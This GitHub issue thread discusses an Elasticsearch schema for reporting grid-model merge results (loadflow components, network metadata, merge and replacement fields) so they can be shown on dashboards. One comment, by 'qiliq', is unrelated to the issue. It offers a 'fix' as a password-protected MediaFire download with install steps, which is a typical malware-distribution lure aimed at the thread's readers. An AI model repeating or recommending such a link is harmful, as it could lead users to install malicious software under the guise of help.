### ISSUE TITLE
Merge report data to elastic for dashbaords

### ISSUE THREAD

**Issue by m-karo** [Baltic-RCC/EMF#141]
{
	@timestamp = "..."
	process_id = 'RMM_CREATION'
	run_id = 'Day-ahead'
	job_id = 'urn:uuid'
	task_id = 'urn:uuid'
	time_horizon
	scenario_timestamp
	version
	
	loadflow.parameters = "CGM_RELAXED_2"
	loadflow.component_count = 5
	loadflow.component1 = {}  # make according islands side, for example log islands bigger than 10 buses
	loadflow.component1.status
	loadflow.component1.iteration_count
	loadflow.component1.buses
	loadflow.component1.branches
	loadflow.component1.active_power_mismatch
	loadflow.component1.distributed_active_power
	loadflow.component1.slack_bus_id
	loadflow.component1.slack_bus_name
	loadflow.component1.total_p_generation
	loadflow.component1.total_p_load
	loadflow.component1.total_q_generation
	loadflow.component1.total_q_load
	loadflow.component1.total_p_losses
	loadflow.component1.total_q_losses

	network.case_date
	network.forecast_distance
	network.id
	network.name = "RMM_001_20240824T0030Z"
	network.nominal_apparent_power = "100.00"
	network.source_format = "CGMES"
	
	merge.status = "successfull/failed"
	merge.included = list
	merge.excluded = with reason????? difference between task included and what we really included
	merge.scaled = True/false
	merge.replacement = True/false
	merge.duration_s = '10'
	merge.uploaded_to_opde = True/false
	merge.uploaded_to_minio = True/false
	merge.content_reference = "minio url"
	
	merge.replacement.entity = LITGRID
	merge.replacement.entity.timestamp_from = datetime
	merge.replacement.entity.timestamp_to = datetime
	merge.replacement.entity.timehorizon_from = 1D
	merge.replacement.entity.timehorizon_to = 2D
	
	merge.scale.entity = ELERING
	merge.scale.entity.scaled_amount = 100
	
}

Global attributes shared in all indexes:
- @timestamp
- time_horizon
- scenario_timestamp
- version

NOTES:

- [ ] emfos-igm-validation index does not have main metadata like time horizon, scenario timestamp
- [ ] emfos-tasks index include also task_id key same _id
- [ ] emfos-merge use scenario timestamp for global filter
- [ ] emfos-merge change network.name to in worker generated model name

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by m-karo** [comment]
Component = island
Test approach as it is in OPDE objects - this will removed component1/2/3
Use @scenario_timestamp and @time_horizon as global keywords
